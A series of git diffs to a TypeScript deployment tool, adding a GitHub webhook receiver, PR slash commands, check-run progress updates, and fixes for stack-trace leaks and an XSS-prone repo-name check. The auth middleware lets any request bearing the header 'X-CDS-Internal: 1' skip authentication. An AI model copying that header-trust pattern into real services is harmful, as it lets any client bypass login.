+      '<sub>@' + sc.commenter + ' 输入命令即可,无需引号。push 到分支也会自动触发 redeploy。</sub>',
+    );
+    return;
+  }
+
+  if (!sc.branchId) {
+    await postReply(
+      `@${sc.commenter} ⚠ 这个 PR 的分支 CDS 还没跟踪到,无法执行 \`/cds ${sc.command}\`。` +
+      `通常等一次 push 触发 webhook 后就能跟踪到; 或者手动推一次空 commit 再试。`,
+    );
+    return;
+  }
+
+  const branch = stateService.getBranch(sc.branchId);
+  if (!branch) {
+    await postReply(`@${sc.commenter} ⚠ CDS 分支 \`${sc.branchId}\` 不存在或已被删除。`);
+    return;
+  }
+
+  if (sc.command === 'redeploy') {
+    const dispatcherFn = dispatchDeploy || defaultLocalhostDeploy(config);
+    const sha = branch.githubCommitSha || '';
+    await postReply(
+      `@${sc.commenter} 🔄 已排队重新部署 \`${sc.branchId}\`${sha ? ` @ ${sha.slice(0, 7)}` : ''}。` +
+      `进度见 Checks 面板的 "CDS Deploy" 条目。`,
+    );
+    dispatcherFn(sc.branchId, sha).catch((err) => {
+      // eslint-disable-next-line no-console
+      console.warn(`[slash] redeploy dispatch failed: ${(err as Error).message}`);
+    });
+    return;
+  }
+
+  if (sc.command === 'stop') {
+    await postReply(`@${sc.commenter} 🛑 正在停止 \`${sc.branchId}\` 的预览容器…`);
+    try {
+      await defaultLocalhostStop(config, sc.branchId);
+      await postReply(`@${sc.commenter} ✓ 预览容器已停。push 或 \`/cds redeploy\` 可重新启动。`);
+    } catch (err) {
+      await postReply(`@${sc.commenter} ✖ 停止失败: ${(err as Error).message}`);
+    }
+    return;
+  }
+
+  if (sc.command === 'logs') {
+    // Pull the latest deploy's last 40 events — same data the
+    // check-run tail shows, but surfaced inline for quick diagnosis.
+    const logs = stateService.getLogs?.(sc.branchId) || stateService.getState().logs?.[sc.branchId] || [];
+    const latest = logs.length > 0 ? logs[logs.length - 1] : null;
+    if (!latest) {
+      await postReply(`@${sc.commenter} ℹ 分支 \`${sc.branchId}\` 暂无部署日志。`);
+      return;
+    }
+    const events = (latest.events || []).slice(-40);
+    const rendered = events.map((ev) => `[${ev.status || '?'}] ${ev.step}: ${ev.title || ''}`).join('\n');
+    const tail = rendered.slice(-8000);
+    await postReply(
+      `@${sc.commenter} 📋 \`${sc.branchId}\` 最近 ${events.length} 条部署事件:\n\n` +
+      '```\n' + tail + '\n```\n\n' +
+      `<sub>完整日志: ${(config.publicBaseUrl || '').replace(/\/$/, '')}/branch-panel?id=${encodeURIComponent(sc.branchId)}</sub>`,
+    );
+    return;
+  }
 }

--- a/cds/src/routes/github-webhook.ts
+++ b/cds/src/routes/github-webhook.ts
@@ -361,10 +361,14 @@ export function createGithubWebhookRouter(deps: GitHubWebhookRouterDeps): Router
     try {
       result = await dispatcher.handle(eventName, payload);
     } catch (err) {
+      // Don't leak the stack trace to the client — file paths, module
+      // versions, and internal structure help post-auth attackers
+      // (Cursor Bugbot #450). Log it server-side for operator access.
+      // eslint-disable-next-line no-console
+      console.warn(`[webhook/self-test] dispatch error: ${(err as Error).stack || (err as Error).message}`);
       res.status(500).json({
         error: 'dispatch_error',
         message: (err as Error).message,
-        stack: (err as Error).stack?.slice(0, 1000),
       });
       return;
     }

--- a/cds/src/routes/github-webhook.ts
+++ b/cds/src/routes/github-webhook.ts
@@ -303,11 +303,17 @@ export function createGithubWebhookRouter(deps: GitHubWebhookRouterDeps): Router
       });
       return;
     }
-    if (!/^[^/\s]+\/[^/\s]+$/.test(repoFullName)) {
+    // Strict allow-list: GitHub owner/repo names use ASCII alnum plus
+    // a handful of safe punctuation. Previous looser regex let through
+    // shell/JS meta-characters (single quotes, backticks) which were
+    // picked up by the client-side onclick handler and caused XSS.
+    // Matches what GitHub itself accepts + what our client-side chip
+    // renderer will accept. Caught by Cursor Bugbot #450 round 5.
+    if (!/^[A-Za-z0-9._-]+\/[A-Za-z0-9._-]+$/.test(repoFullName)) {
       res.status(400).json({
         error: 'validation',
         field: 'repoFullName',
-        message: 'repoFullName 必须是 "owner/repo" 格式',
+        message: 'repoFullName 必须是 "owner/repo" 格式,仅允许字母/数字/点/下划线/短横线',
       });
       return;
     }

--- a/cds/src/routes/github-webhook.ts
+++ b/cds/src/routes/github-webhook.ts
@@ -359,11 +359,16 @@ export function createGithubWebhookRouter(deps: GitHubWebhookRouterDeps): Router
     const payload = body.payload ?? {};
     let result;
     try {
-      result = await dispatcher.handle(eventName, payload);
+      // dryRun=true: dispatcher parses events & returns what WOULD
+      // happen but skips every state mutation (addBranch / worktree
+      // create / updateProject / save). This is safe for diagnosing
+      // slash commands / signature chain without corrupting state.
+      // Caught by Cursor Bugbot #450 round 3.
+      result = await dispatcher.handle(eventName, payload, { dryRun: true });
     } catch (err) {
       // Don't leak the stack trace to the client — file paths, module
-      // versions, and internal structure help post-auth attackers
-      // (Cursor Bugbot #450). Log it server-side for operator access.
+      // versions, and internal structure help post-auth attackers.
+      // Log it server-side for operator access.
       // eslint-disable-next-line no-console
       console.warn(`[webhook/self-test] dispatch error: ${(err as Error).stack || (err as Error).message}`);
       res.status(500).json({
@@ -372,12 +377,12 @@ export function createGithubWebhookRouter(deps: GitHubWebhookRouterDeps): Router
       });
       return;
     }
-    // Do NOT actually fire deploy/stop/comment side-effects in
-    // self-test — the point is to confirm the dispatch chain. Return
-    // what WOULD have happened.
+    // Neither the dispatcher mutations NOR the post-dispatch
+    // side-effects (deploy / stop / PR comment) fire in self-test.
     res.json({
       ok: true,
       event: eventName,
+      dryRun: true,
       dispatcherResult: result,
       sideEffectsSimulated: {
         deployDispatch: Boolean(result.deployRequest),

--- a/cds/src/routes/github-webhook.ts
+++ b/cds/src/routes/github-webhook.ts
@@ -1,0 +1,333 @@
+/**
+ * GitHub webhook receiver + GitHub App integration endpoints.
+ *
+ * Mounted at /api so the public webhook URL is
+ * `https://<cds>/api/github/webhook`. Relies on a raw-body middleware
+ * installed in `server.ts` (before `express.json()`) that writes the
+ * unparsed body to `req.rawBody` — we need the exact bytes GitHub
+ * signed, not the re-serialized JSON.
+ *
+ * Endpoints:
+ *   POST /api/github/webhook
+ *     GitHub-facing webhook receiver. Verifies signature, dispatches
+ *     the event, and optionally kicks off a branch deploy.
+ *
+ *   GET /api/github/app
+ *     Whether the GitHub App is configured + the install URL.
+ *
+ *   GET /api/github/installations
+ *     List installations (used by the Settings page for linking).
+ *
+ *   GET /api/github/installations/:id/repos
+ *     List repos accessible to an installation.
+ *
+ *   POST /api/projects/:id/github/link
+ *     Link a project to an (installationId, repoFullName) pair.
+ *
+ *   DELETE /api/projects/:id/github/link
+ *     Remove the link.
+ */
+
+import { Router, type Request, type Response } from 'express';
+import type { StateService } from '../services/state.js';
+import type { WorktreeService } from '../services/worktree.js';
+import type { IShellExecutor, CdsConfig } from '../types.js';
+import {
+  GitHubAppClient,
+  buildInstallUrl,
+  verifyWebhookSignature,
+} from '../services/github-app-client.js';
+import {
+  GitHubWebhookDispatcher,
+  type WebhookDispatchResult,
+} from '../services/github-webhook-dispatcher.js';
+
+export interface GitHubWebhookRouterDeps {
+  stateService: StateService;
+  worktreeService: WorktreeService;
+  shell: IShellExecutor;
+  config: CdsConfig;
+  /** Optional override for tests — production sets it from the App config. */
+  githubApp?: GitHubAppClient | null;
+  /**
+   * Internal deploy dispatcher. Called after a successful webhook to
+   * trigger `POST /api/branches/:id/deploy` without re-implementing the
+   * full deploy pipeline. In production this is a localhost HTTP call
+   * with the X-CDS-Internal header that bypasses cookie auth. Injected
+   * so tests can observe without spinning a full Express server.
+   */
+  dispatchDeploy?: (branchId: string, commitSha: string) => Promise<void>;
+}
+
+/**
+ * Build a request type so we can type `req.rawBody` without augmenting
+ * the Express global.
+ */
+type RawBodyRequest = Request & { rawBody?: Buffer };
+
+export function createGithubWebhookRouter(deps: GitHubWebhookRouterDeps): Router {
+  const router = Router();
+  const {
+    stateService,
+    worktreeService,
+    shell,
+    config,
+    githubApp,
+    dispatchDeploy,
+  } = deps;
+
+  const dispatcher = new GitHubWebhookDispatcher({
+    stateService,
+    worktreeService,
+    shell,
+    config,
+    githubApp: githubApp || undefined,
+  });
+
+  // ── POST /api/github/webhook ───────────────────────────────────────
+  router.post('/github/webhook', async (req: RawBodyRequest, res) => {
+    const githubAppConfig = config.githubApp;
+    if (!githubAppConfig) {
+      res.status(503).json({
+        error: 'not_configured',
+        message: 'GitHub App webhook not configured (CDS_GITHUB_APP_ID et al. missing).',
+      });
+      return;
+    }
+
+    const signature = req.headers['x-hub-signature-256'] as string | undefined;
+    const eventName = req.headers['x-github-event'] as string | undefined;
+    const deliveryId = req.headers['x-github-delivery'] as string | undefined;
+
+    if (!eventName) {
+      res.status(400).json({ error: 'missing_event_header' });
+      return;
+    }
+    const rawBody = req.rawBody;
+    if (!rawBody || !Buffer.isBuffer(rawBody)) {
+      res.status(400).json({
+        error: 'missing_raw_body',
+        message: 'Raw body unavailable — webhook route must be mounted before express.json().',
+      });
+      return;
+    }
+
+    const verified = verifyWebhookSignature(rawBody, signature, githubAppConfig.webhookSecret);
+    if (!verified) {
+      // eslint-disable-next-line no-console
+      console.warn(`[webhook] signature verification failed (delivery=${deliveryId || '?'})`);
+      res.status(401).json({ error: 'invalid_signature' });
+      return;
+    }
+
+    let payload: unknown;
+    try {
+      payload = JSON.parse(rawBody.toString('utf-8'));
+    } catch (err) {
+      res.status(400).json({ error: 'invalid_json', message: (err as Error).message });
+      return;
+    }
+
+    let result: WebhookDispatchResult;
+    try {
+      result = await dispatcher.handle(eventName, payload);
+    } catch (err) {
+      // eslint-disable-next-line no-console
+      console.error(
+        `[webhook] dispatch error event=${eventName} delivery=${deliveryId || '?'}:`,
+        err,
+      );
+      res.status(500).json({
+        error: 'dispatch_error',
+        message: (err as Error).message,
+      });
+      return;
+    }
+
+    // Kick off the deploy asynchronously. The webhook response is sent
+    // back to GitHub within the GitHub 10s timeout regardless of how
+    // long the build takes.
+    if (result.deployRequest) {
+      const request = result.deployRequest;
+      // Use the injected dispatcher for tests; default to a localhost HTTP
+      // call to this same CDS instance.
+      const dispatcherFn = dispatchDeploy || defaultLocalhostDeploy(config);
+      dispatcherFn(request.branchId, request.commitSha).catch((err) => {
+        // eslint-disable-next-line no-console
+        console.error(
+          `[webhook] deploy dispatch failed for branch=${request.branchId}:`,
+          (err as Error).message,
+        );
+      });
+    }
+
+    res.json({
+      ok: true,
+      event: eventName,
+      delivery: deliveryId,
+      action: result.action,
+      message: result.message,
+      branchId: result.branchId,
+      deployDispatched: Boolean(result.deployRequest),
+    });
+  });
+
+  // ── GET /api/github/app ────────────────────────────────────────────
+  router.get('/github/app', (_req, res) => {
+    const ghApp = config.githubApp;
+    if (!ghApp) {
+      res.json({ configured: false });
+      return;
+    }
+    res.json({
+      configured: true,
+      appId: ghApp.appId,
+      appSlug: ghApp.appSlug || null,
+      installUrl: buildInstallUrl(ghApp.appSlug),
+      publicBaseUrl: config.publicBaseUrl || null,
+      webhookUrl: config.publicBaseUrl ? `${config.publicBaseUrl.replace(/\/$/, '')}/api/github/webhook` : null,
+    });
+  });
+
+  // ── GET /api/github/installations ──────────────────────────────────
+  router.get('/github/installations', async (_req, res) => {
+    if (!githubApp) {
+      res.status(503).json({ error: 'not_configured' });
+      return;
+    }
+    try {
+      const installations = await githubApp.listInstallations();
+      res.json({ installations });
+    } catch (err) {
+      res.status(500).json({
+        error: 'list_installations_failed',
+        message: (err as Error).message,
+      });
+    }
+  });
+
+  // ── GET /api/github/installations/:id/repos ────────────────────────
+  router.get('/github/installations/:id/repos', async (req, res) => {
+    if (!githubApp) {
+      res.status(503).json({ error: 'not_configured' });
+      return;
+    }
+    const installationId = parseInt(req.params.id, 10);
+    if (!Number.isFinite(installationId)) {
+      res.status(400).json({ error: 'invalid_installation_id' });
+      return;
+    }
+    try {
+      const repos = await githubApp.listInstallationRepos(installationId);
+      res.json({ repos });
+    } catch (err) {
+      res.status(500).json({
+        error: 'list_repos_failed',
+        message: (err as Error).message,
+      });
+    }
+  });
+
+  // ── POST /api/projects/:id/github/link ─────────────────────────────
+  router.post('/projects/:id/github/link', (req, res) => {
+    const project = stateService.getProject(req.params.id);
+    if (!project) {
+      res.status(404).json({ error: 'project_not_found' });
+      return;
+    }
+    const body = (req.body || {}) as Partial<{
+      installationId: number;
+      repoFullName: string;
+      autoDeploy: boolean;
+    }>;
+    const installationId = typeof body.installationId === 'number' ? body.installationId : NaN;
+    const repoFullName = typeof body.repoFullName === 'string' ? body.repoFullName.trim() : '';
+    if (!Number.isFinite(installationId) || !repoFullName) {
+      res.status(400).json({
+        error: 'validation',
+        message: 'installationId (number) 和 repoFullName (string) 都是必填项',
+      });
+      return;
+    }
+    if (!/^[^/\s]+\/[^/\s]+$/.test(repoFullName)) {
+      res.status(400).json({
+        error: 'validation',
+        field: 'repoFullName',
+        message: 'repoFullName 必须是 "owner/repo" 格式',
+      });
+      return;
+    }
+    const existing = stateService.findProjectByRepoFullName(repoFullName);
+    if (existing && existing.id !== project.id) {
+      res.status(409).json({
+        error: 'already_linked',
+        message: `${repoFullName} 已经绑定到项目 ${existing.name}`,
+      });
+      return;
+    }
+    const autoDeploy = body.autoDeploy === undefined ? true : Boolean(body.autoDeploy);
+    stateService.updateProject(project.id, {
+      githubInstallationId: installationId,
+      githubRepoFullName: repoFullName,
+      githubAutoDeploy: autoDeploy,
+      githubLinkedAt: new Date().toISOString(),
+    });
+    const updated = stateService.getProject(project.id)!;
+    res.json({ project: updated });
+  });
+
+  // ── DELETE /api/projects/:id/github/link ───────────────────────────
+  router.delete('/projects/:id/github/link', (req, res) => {
+    const project = stateService.getProject(req.params.id);
+    if (!project) {
+      res.status(404).json({ error: 'project_not_found' });
+      return;
+    }
+    stateService.updateProject(project.id, {
+      githubInstallationId: undefined,
+      githubRepoFullName: undefined,
+      githubAutoDeploy: undefined,
+      githubLinkedAt: undefined,
+    });
+    res.json({ ok: true });
+  });
+
+  return router;
+}
+
+/**
+ * Default deploy dispatcher — does an internal POST to
+ * `http://localhost:<masterPort>/api/branches/:id/deploy` with the
+ * `X-CDS-Internal: 1` header so it passes any cookie auth middleware.
+ * The response body is an SSE stream; we don't read it (deploy events
+ * are logged server-side anyway).
+ */
+function defaultLocalhostDeploy(config: CdsConfig): (branchId: string, commitSha: string) => Promise<void> {
+  return async (branchId) => {
+    const url = `http://127.0.0.1:${config.masterPort}/api/branches/${encodeURIComponent(branchId)}/deploy`;
+    const res = await fetch(url, {
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-CDS-Internal': '1',
+      },
+      body: JSON.stringify({}),
+    });
+    // Drain the SSE stream so Node doesn't complain about unhandled
+    // socket errors. We don't care about the events here — the deploy
+    // route already persists logs and updates branch state.
+    if (res.body && typeof (res.body as any).getReader === 'function') {
+      const reader = (res.body as any).getReader();
+      (async () => {
+        try {
+          while (true) {
+            const { done } = await reader.read();
+            if (done) break;
+          }
+        } catch {
+          /* ignore */
+        }
+      })();
+    }
+  };
+}

--- a/cds/src/routes/github-webhook.ts
+++ b/cds/src/routes/github-webhook.ts
@@ -330,6 +330,60 @@ export function createGithubWebhookRouter(deps: GitHubWebhookRouterDeps): Router
     res.json({ project: updated });
   });
 
+  // ── POST /api/github/webhook/self-test ─────────────────────────────
+  //
+  // Synthetic webhook dispatcher — lets the admin exercise the event
+  // handler path WITHOUT depending on GitHub actually delivering a
+  // webhook. Critical for diagnosing "is slash command flow broken, or
+  // is the App just not subscribed to issue_comment?"
+  //
+  // Request body: { eventName, payload } — same shape GitHub sends.
+  // No HMAC verification (auth sits at the outer /api middleware).
+  //
+  // Returns the dispatcher result + whether deploy/stop/comment
+  // actions were triggered. Safe to invoke from Settings UI.
+  router.post('/github/webhook/self-test', async (req, res) => {
+    if (!config.githubApp) {
+      res.status(503).json({ error: 'not_configured', message: 'GitHub App 未配置' });
+      return;
+    }
+    const body = (req.body || {}) as {
+      eventName?: string;
+      payload?: unknown;
+    };
+    const eventName = typeof body.eventName === 'string' ? body.eventName : '';
+    if (!eventName) {
+      res.status(400).json({ error: 'missing_event', message: 'eventName (e.g. "push", "issue_comment") is required' });
+      return;
+    }
+    const payload = body.payload ?? {};
+    let result;
+    try {
+      result = await dispatcher.handle(eventName, payload);
+    } catch (err) {
+      res.status(500).json({
+        error: 'dispatch_error',
+        message: (err as Error).message,
+        stack: (err as Error).stack?.slice(0, 1000),
+      });
+      return;
+    }
+    // Do NOT actually fire deploy/stop/comment side-effects in
+    // self-test — the point is to confirm the dispatch chain. Return
+    // what WOULD have happened.
+    res.json({
+      ok: true,
+      event: eventName,
+      dispatcherResult: result,
+      sideEffectsSimulated: {
+        deployDispatch: Boolean(result.deployRequest),
+        stopDispatch: Boolean(result.stopRequest),
+        prComment: result.action === 'pr-comment-posted',
+        slashCommand: result.slashCommand?.command,
+      },
+    });
+  });
+
   // ── DELETE /api/projects/:id/github/link ───────────────────────────
   router.delete('/projects/:id/github/link', (req, res) => {
     const project = stateService.getProject(req.params.id);
@@ -357,7 +411,7 @@ export function createGithubWebhookRouter(deps: GitHubWebhookRouterDeps): Router
  * are logged server-side anyway).
  */
 function defaultLocalhostDeploy(config: CdsConfig): (branchId: string, commitSha: string) => Promise<void> {
-  return async (branchId) => {
+  return async (branchId, commitSha) => {
     const url = `http://127.0.0.1:${config.masterPort}/api/branches/${encodeURIComponent(branchId)}/deploy`;
     const res = await fetch(url, {
       method: 'POST',
@@ -365,7 +419,12 @@ function defaultLocalhostDeploy(config: CdsConfig): (branchId: string, commitSha
         'Content-Type': 'application/json',
         'X-CDS-Internal': '1',
       },
-      body: JSON.stringify({}),
+      // Pass the triggering commit SHA so the deploy route can stamp it
+      // authoritatively instead of racing against concurrent pushes
+      // that may have updated the branch entry between dispatch and
+      // the route's own re-read. The deploy route falls back to
+      // `entry.githubCommitSha` when body.commitSha is missing.
+      body: JSON.stringify({ commitSha }),
     });
     // Drain the SSE stream so Node doesn't complain about unhandled
     // socket errors. We don't care about the events here — the deploy
@@ -545,6 +604,10 @@ async function runSlashCommand(
 
   if (sc.command === 'redeploy') {
     const dispatcherFn = dispatchDeploy || defaultLocalhostDeploy(config);
+    // We pass whatever SHA is currently on the branch entry. For a
+    // pure /cds redeploy without a preceding push, this may be stale
+    // or empty — the deploy route then falls back to `git rev-parse
+    // HEAD` on the worktree.
     const sha = branch.githubCommitSha || '';
     await postReply(
       `@${sc.commenter} 🔄 已排队重新部署 \`${sc.branchId}\`${sha ? ` @ ${sha.slice(0, 7)}` : ''}。` +

--- a/cds/src/server.ts
+++ b/cds/src/server.ts
@@ -11,6 +11,7 @@ import { createStorageModeRouter, type StorageModeContext } from './routes/stora
 import { createGithubOAuthRouter } from './routes/github-oauth.js';
 import { createGithubWebhookRouter } from './routes/github-webhook.js';
 import { GitHubAppClient } from './services/github-app-client.js';
+import { CheckRunRunner } from './services/check-run-runner.js';
 import { createAuthRouter } from './routes/auth.js';
 import { createWorkspacesRouter } from './routes/workspaces.js';
 import { MemoryAuthStore } from './infra/auth-store/memory-store.js';
@@ -919,6 +920,30 @@ export function createServer(deps: ServerDeps): express.Express {
         appSlug: deps.config.githubApp.appSlug,
       })
     : undefined;
+
+  // ── Reconcile orphan check-runs on boot ──
+  //
+  // self-update / self-force-sync / crash can leave check-runs in
+  // `status=in_progress` forever because the finalize() PATCH was
+  // interrupted by restart. GitHub's PR Checks panel then shows every
+  // commit in "pending / 准备状态" indefinitely even though CDS has
+  // long since finished deploying.
+  //
+  // Walk every branch with a stamped checkRunId and PATCH to
+  // conclusion=neutral (grey dot) the ones that aren't currently
+  // building. Fire-and-forget so the server boot isn't blocked on
+  // GitHub API latency.
+  if (githubAppClient) {
+    const runner = new CheckRunRunner({
+      stateService: deps.stateService,
+      githubApp: githubAppClient,
+      config: deps.config,
+    });
+    runner.reconcileOrphans().catch((err: Error) => {
+      // eslint-disable-next-line no-console
+      console.warn('[check-run] startup reconciliation failed:', err.message);
+    });
+  }
 
   app.use('/api', createBranchRouter({
     stateService: deps.stateService,

--- a/cds/src/server.ts
+++ b/cds/src/server.ts
@@ -9,6 +9,8 @@ import { createProjectsRouter } from './routes/projects.js';
 import { createPendingImportRouter } from './routes/pending-import.js';
 import { createStorageModeRouter, type StorageModeContext } from './routes/storage-mode.js';
 import { createGithubOAuthRouter } from './routes/github-oauth.js';
+import { createGithubWebhookRouter } from './routes/github-webhook.js';
+import { GitHubAppClient } from './services/github-app-client.js';
 import { createAuthRouter } from './routes/auth.js';
 import { createWorkspacesRouter } from './routes/workspaces.js';
 import { MemoryAuthStore } from './infra/auth-store/memory-store.js';
@@ -143,6 +145,9 @@ function resolveApiLabel(method: string, path: string): string {
     'POST /bridge/navigate-request': 'AI 请求用户导航',
     'POST /bridge/start-session': 'AI 开始操作页面',
     'POST /bridge/end-session': 'AI 操作完成',
+    'POST /github/webhook': 'GitHub 推送 Webhook',
+    'GET /github/app': '查询 GitHub App 配置',
+    'GET /github/installations': '列出 GitHub App 安装',
   };
 
   const key = `${method} ${p}`;
@@ -301,7 +306,15 @@ function resolveAiSession(req: express.Request, stateService?: StateService): Ap
 export function createServer(deps: ServerDeps): express.Express {
   const app = express();
   app.set('etag', false);            // Disable ETag — prevents 304 on API polling (CDS is a dev tool, caching is misleading)
-  app.use(express.json());
+  // `verify` is called with the raw buffer before body-parser parses it.
+  // We stash the bytes on req.rawBody so the GitHub webhook route can
+  // HMAC-verify the exact payload GitHub signed (re-serialized JSON
+  // would produce a different hash and fail signature checks).
+  app.use(express.json({
+    verify: (req, _res, buf) => {
+      (req as { rawBody?: Buffer }).rawBody = buf;
+    },
+  }));
 
   const webDir = path.resolve(__dirname, '..', 'web');
 
@@ -569,6 +582,9 @@ export function createServer(deps: ServerDeps): express.Express {
     app.use((req, res, next) => {
       if (req.path === '/login.html' || req.path === '/api/login' || req.path === '/api/logout') return next();
       if (req.path.startsWith('/api/ai/request-access') || req.path.startsWith('/api/ai/request-status/')) return next();
+      // GitHub webhook is public — it's authenticated by HMAC signature
+      // verification inside the handler, not by the cookie/token middleware.
+      if (req.method === 'POST' && req.path === '/api/github/webhook') return next();
       if (/\.(css|js|ico|png|svg|woff2?)$/i.test(req.path)) return next();
       // Allow internal requests from widget proxy (/_cds/ → master)
       if (req.headers['x-cds-internal'] === '1') return next();
@@ -890,6 +906,20 @@ export function createServer(deps: ServerDeps): express.Express {
   // Mounted at /api so the nested /projects/:id/pending-import path works
   // alongside the rest of the projects router.
   app.use('/api', createPendingImportRouter({ stateService: deps.stateService }));
+  // ── GitHub App client (optional) ──
+  //
+  // Instantiate once and share between the webhook router and the branch
+  // router. Absent when CDS_GITHUB_APP_* env vars are not set — both
+  // consumers handle `undefined` gracefully (routes return 503, deploys
+  // skip check-run creation).
+  const githubAppClient = deps.config.githubApp
+    ? new GitHubAppClient({
+        appId: deps.config.githubApp.appId,
+        privateKey: deps.config.githubApp.privateKey,
+        appSlug: deps.config.githubApp.appSlug,
+      })
+    : undefined;
+
   app.use('/api', createBranchRouter({
     stateService: deps.stateService,
     worktreeService: deps.worktreeService,
@@ -899,6 +929,23 @@ export function createServer(deps: ServerDeps): express.Express {
     schedulerService: deps.schedulerService,
     registry: deps.registry,
     getClusterStrategy: deps.getClusterStrategy,
+    githubApp: githubAppClient,
+  }));
+
+  // ── GitHub App webhook + linking endpoints (P6) ──
+  //
+  // POST /api/github/webhook is public-facing (GitHub hits it) but
+  // protected by HMAC signature verification inside the route handler.
+  // The GET /api/github/app + /installations + /projects/:id/github/link
+  // endpoints go through the normal auth middleware (cookie or AI key).
+  // When githubApp isn't configured, /github/webhook returns 503 and the
+  // other endpoints return 503 — the frontend hides the integration UI.
+  app.use('/api', createGithubWebhookRouter({
+    stateService: deps.stateService,
+    worktreeService: deps.worktreeService,
+    shell: deps.shell,
+    config: deps.config,
+    githubApp: githubAppClient,
   }));
 
   // P4 Part 18 (D.3): storage-mode management endpoints. Requires the

--- a/cds/src/services/check-run-runner.ts
+++ b/cds/src/services/check-run-runner.ts
@@ -301,7 +301,18 @@ export class CheckRunRunner {
         });
         // Drop the stale id so next deploy creates a fresh check run
         // instead of PATCHing this one to in_progress.
-        this.deps.stateService.updateBranchGithubMeta(entry.id, { githubCheckRunId: undefined });
+        //
+        // Compare-and-swap: if a concurrent webhook-triggered deploy
+        // already called ensureOpen() between our iteration start and
+        // here, the branch entry's checkRunId would have been replaced
+        // by a NEW id. Clearing blindly would wipe that fresh id,
+        // leaving the deploy's finalize() unable to close the run.
+        // Only clear when the id still matches the one we just PATCHed.
+        // Caught by Cursor Bugbot #450 round 5.
+        const latest = this.deps.stateService.getBranch(entry.id);
+        if (latest && latest.githubCheckRunId === id) {
+          this.deps.stateService.updateBranchGithubMeta(entry.id, { githubCheckRunId: undefined });
+        }
       } catch (err) {
         // eslint-disable-next-line no-console
         console.warn(

--- a/cds/src/services/check-run-runner.ts
+++ b/cds/src/services/check-run-runner.ts
@@ -199,6 +199,7 @@ export class CheckRunRunner {
       text = '### Deploy log (尾部)\n\n```\n' + tail + '\n```';
     }
 
+    let patched = false;
     try {
       await this.deps.githubApp!.updateCheckRun(instId, parsed.owner, parsed.repo, id, {
         status: 'completed',
@@ -211,6 +212,7 @@ export class CheckRunRunner {
           ...(text ? { text } : {}),
         },
       });
+      patched = true;
     } catch (err) {
       // eslint-disable-next-line no-console
       console.warn(
@@ -219,6 +221,18 @@ export class CheckRunRunner {
       );
     }
     this._lastProgressMs.delete(id);
+    // After GitHub confirms the completed state, clear the stamped id
+    // from state so the next CDS restart's reconcileOrphans doesn't
+    // re-PATCH this already-completed run to `neutral` (which would
+    // overwrite green/red with grey). If the PATCH failed we KEEP the
+    // id so the reconciler can try again. Caught by Cursor Bugbot
+    // review on #450.
+    if (patched) {
+      this.deps.stateService.updateBranchGithubMeta(entry.id, {
+        githubCheckRunId: undefined,
+      });
+      try { this.deps.stateService.save(); } catch { /* best-effort */ }
+    }
   }
 
   /**

--- a/cds/src/services/check-run-runner.ts
+++ b/cds/src/services/check-run-runner.ts
@@ -30,6 +30,13 @@ export interface CheckRunRunnerDeps {
 export class CheckRunRunner {
   constructor(private readonly deps: CheckRunRunnerDeps) {}
 
+  // Tracks the last progress PATCH time per check-run id so we don't
+  // flood GitHub's API during a chatty deploy (dozens of log lines
+  // per second). 5s throttle = ~12 PATCHes/minute, well under the
+  // 5000/hour core limit even for a single noisy deploy.
+  private readonly _lastProgressMs = new Map<number, number>();
+  private static readonly PROGRESS_THROTTLE_MS = 5_000;
+
   private get enabled(): boolean {
     return Boolean(this.deps.githubApp);
   }
@@ -103,6 +110,53 @@ export class CheckRunRunner {
   }
 
   /**
+   * Push an intermediate progress update. Keeps status=in_progress but
+   * updates the output title + summary so users refreshing GitHub's PR
+   * Checks panel see "正在构建 admin (1/2)…" instead of a stale
+   * "Deploying to CDS…" for the entire build.
+   *
+   * Throttled per check-run so we don't spam GitHub during a chatty
+   * deploy. `force=true` bypasses the throttle (use for layer start /
+   * layer done milestones that should always land).
+   */
+  async progress(entry: BranchEntry, opts: {
+    title: string;
+    summary: string;
+    force?: boolean;
+  }): Promise<void> {
+    if (!this.enabled) return;
+    const id = entry.githubCheckRunId;
+    const repoFullName = entry.githubRepoFullName;
+    const instId = entry.githubInstallationId;
+    if (!id || !repoFullName || !instId) return;
+    const parsed = this.parseRepo(repoFullName);
+    if (!parsed) return;
+
+    if (!opts.force) {
+      const last = this._lastProgressMs.get(id) || 0;
+      if (Date.now() - last < CheckRunRunner.PROGRESS_THROTTLE_MS) return;
+    }
+    this._lastProgressMs.set(id, Date.now());
+
+    try {
+      await this.deps.githubApp!.updateCheckRun(instId, parsed.owner, parsed.repo, id, {
+        status: 'in_progress',
+        detailsUrl: this.buildDetailsUrl(entry.id),
+        output: {
+          title: opts.title,
+          summary: opts.summary,
+        },
+      });
+    } catch (err) {
+      // eslint-disable-next-line no-console
+      console.warn(
+        `[check-run] progress PATCH failed for branch=${entry.id}:`,
+        (err as Error).message,
+      );
+    }
+  }
+
+  /**
    * Close out the check run with the final status + a summary the user
    * can read in GitHub's UI. No-op when no check-run was opened.
    */
@@ -110,6 +164,13 @@ export class CheckRunRunner {
     conclusion: 'success' | 'failure' | 'neutral' | 'cancelled';
     summary: string;
     previewUrl?: string;
+    /**
+     * Optional tail of deploy log events to embed in the check-run
+     * output. Rendered as a fenced code block in `output.text` — GitHub
+     * collapses `text` by default but makes it expandable under a
+     * "Show more" affordance, which is perfect for failure postmortem.
+     */
+    logTail?: string;
   }): Promise<void> {
     if (!this.enabled) return;
     const id = entry.githubCheckRunId;
@@ -130,6 +191,14 @@ export class CheckRunRunner {
     const summaryLines = [opts.summary];
     if (opts.previewUrl) summaryLines.push('', `预览地址: ${opts.previewUrl}`);
 
+    // GitHub's output.text caps at 65535 chars; we trim to 30k to stay
+    // comfortably under the limit with room for markdown chrome.
+    let text: string | undefined;
+    if (opts.logTail && opts.logTail.trim()) {
+      const tail = opts.logTail.slice(-30_000);
+      text = '### Deploy log (尾部)\n\n```\n' + tail + '\n```';
+    }
+
     try {
       await this.deps.githubApp!.updateCheckRun(instId, parsed.owner, parsed.repo, id, {
         status: 'completed',
@@ -139,6 +208,7 @@ export class CheckRunRunner {
         output: {
           title,
           summary: summaryLines.join('\n'),
+          ...(text ? { text } : {}),
         },
       });
     } catch (err) {
@@ -148,6 +218,7 @@ export class CheckRunRunner {
         (err as Error).message,
       );
     }
+    this._lastProgressMs.delete(id);
   }
 
   /**

--- a/cds/src/services/check-run-runner.ts
+++ b/cds/src/services/check-run-runner.ts
@@ -260,9 +260,13 @@ export class CheckRunRunner {
       const repoFullName = entry.githubRepoFullName;
       const instId = entry.githubInstallationId;
       if (!id || !repoFullName || !instId) continue;
